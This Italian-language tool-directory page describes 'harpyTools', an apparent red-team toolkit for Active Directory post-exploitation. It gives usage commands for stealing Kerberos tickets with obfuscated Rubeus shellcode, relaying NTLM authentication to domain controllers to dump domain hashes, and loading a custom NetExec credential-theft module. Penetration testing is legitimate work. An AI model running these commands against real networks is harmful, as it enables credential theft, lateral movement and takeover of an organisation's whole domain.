Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
harpyTools — Toolkit automatizzato per post-exploitation di Active Directory per estrazione di ticket Kerberos, attacchi di relay NTLM e movimento laterale tramite integrazione con NetExec, Impacket e Donut. | Kitploit
Strumenti/GitHubGitHub/jssngc/harpytools
Escalation di PrivilegiGenerazione di PayloadExploitMovimento LateraleShellcodePost-ExploitPenetration TestingCommand and ControlRed Teaming
GitHubjssngc/harpytools

harpyTools

Toolkit automatizzato per post-exploitation di Active Directory per estrazione di ticket Kerberos, attacchi di relay NTLM e movimento laterale tramite integrazione con NetExec, Impacket e Donut.

1921 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Utility di post-sfruttamento e automazione relay per Active Directory

Questo repository contiene una raccolta di script orchestratore Python progettati per valutazioni di sicurezza e penetration testing in ambienti Active Directory. Questi strumenti sono specificamente progettati per scenari di post-sfruttamento in cui l'accesso amministrativo locale è già stato ottenuto su una workstation o server compromesso, con l'obiettivo di eseguire movimento laterale o escalation di privilegi verso il più ampio dominio Active Directory.

Automatizzando flussi di lavoro che coinvolgono utility di sicurezza comuni come NetExec, Impacket, Donut e BloodyAD, questi script semplificano processi complessi multi-step in operazioni ripetibili a comando singolo.

Prerequisiti

Gli script richiedono che i seguenti strumenti siano installati sul sistema host e disponibili nel PATH del sistema:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (generatore di shellcode)
  • Myph (compilatore/offuscatore binario)
  • BloodyAD (strumento di amministrazione Active Directory)
  • Utility Linux standard: awk, base64

Dipendenze Python Opzionali

Per una formattazione avanzata dell'output della console, installa i seguenti pacchetti:

root@kitploit:~
pip install colorama rich

Panoramica dei Componenti

1. Orchestratore di Estrazione TGT (harpyTGT.py)

Questo script automatizza l'estrazione di un Ticket Granting Ticket (TGT) Kerberos da una sessione Windows attiva e lo converte in un formato ccache compatibile con Linux.

  • Scenario: Una volta ottenuto l'accesso come amministratore locale su una macchina, questo strumento consente agli operatori di raccogliere i ticket Kerberos degli utenti di dominio attivi su quell'host, permettendo il movimento laterale senza conoscere le loro password in chiaro.
  • Meccanismo: Genera un payload shellcode Rubeus.exe tramite Donut, applica offuscamento usando Myph ed esegue il binario risultante sull'host target utilizzando attività pianificate (schtask_as) o mmcexec.

Esecuzione Standard (l'utente target ha privilegi amministrativi):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>

Esecuzione Alternativa (l'utente target non ha privilegi amministrativi):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

2. Automazione Relay NTLM (harpyRelay.py)

Questo script coordina attacchi relay NTLM mirati a politiche di firma SMB o LDAP malconfigurate sui Domain Controller per ottenere escalation di privilegi a livello di dominio o eseguire un dump del database NTDS (DCSync).

  • Scenario: Sfruttando i privilegi amministrativi locali esistenti su un host compromesso, lo script forza un processo con privilegi elevati (come una sessione di Amministratore di Dominio) ad autenticarsi nuovamente verso l'attaccante, relayando quelle credenziali al Domain Controller per compromettere l'intero dominio tramite LDAP/LDAPS.
  • Meccanismo: Avvia un listener ntlmrelayx, triggera una richiesta di autenticazione dal client compromesso tramite NetExec, monitora l'output per lo sfruttamento riuscito e scarica gli hash del dominio. Lo strumento contiene routine di pulizia automatiche per minimizzare l'impronta nel dominio target.

Flusso LDAPS (Standard):

root@kitploit:~
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>

Flusso LDAP (flusso alternativo quando LDAPS non è disponibile):

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

3. Modulo NetExec: stealTGT

Un modulo personalizzato per NetExec (nxc) progettato per estrarre il Ticket Granting Ticket (TGT) Kerberos da un utente specifico connesso alla macchina target.

Il modulo interagisce tramite mmcexec come SYSTEM, automatizzando la generazione di un payload elusivo (incapsulando Rubeus con Donut e Myph), eseguendolo in memoria, catturando l'output del ticket in Base64 e convertendolo trasparentemente in un file .ccache pronto per l'uso in Linux.

Prerequisiti sull'Host Attaccante (Kali Linux)

Il modulo verifica automaticamente che le seguenti utility siano installate e disponibili nel tuo $PATH:

  • donut
  • myph
  • impacket-ticketConverter

Installazione del Modulo

Per caricare il modulo esterno in NetExec, copia lo script stealTGT.py nella directory dei moduli NetExec locale:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

Utilizzo e Sintassi

root@kitploit:~
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe

Opzioni del Modulo (-o):

  • USER: Il nome utente della sessione attualmente attiva da cui si desidera raccogliere il TGT (es., jdoe).
  • RUBEUS: Il percorso locale sulla macchina attaccante dove si trova il binario legittimo Rubeus.exe.

Caratteristiche Operative

  • Pulizia Automatica dell'Ambiente: L'utility di relay tiene traccia degli account effimeri creati durante l'esecuzione e tenta automaticamente la rimozione tramite bloodyad o netexec una volta concluse le operazioni.
  • Gestione di Ambienti Non-TLS: Include fallback espliciti per ambienti in cui i Domain Controller non supportano LDAP su TLS (LDAPS).

Dichiarazione di non responsabilità

AVVISO IMPORTANTE: Questo repository è destinato esclusivamente a audit di sicurezza autorizzati, ricerca di vulnerabilità e scopi educativi. L'esecuzione di questi strumenti contro infrastrutture di produzione senza previa autorizzazione esplicita e scritta dei proprietari del sistema è severamente vietata. L'autore declina ogni responsabilità per uso improprio, danni collaterali o conseguenze legali derivanti dall'implementazione di questo software.

Scarica lo strumento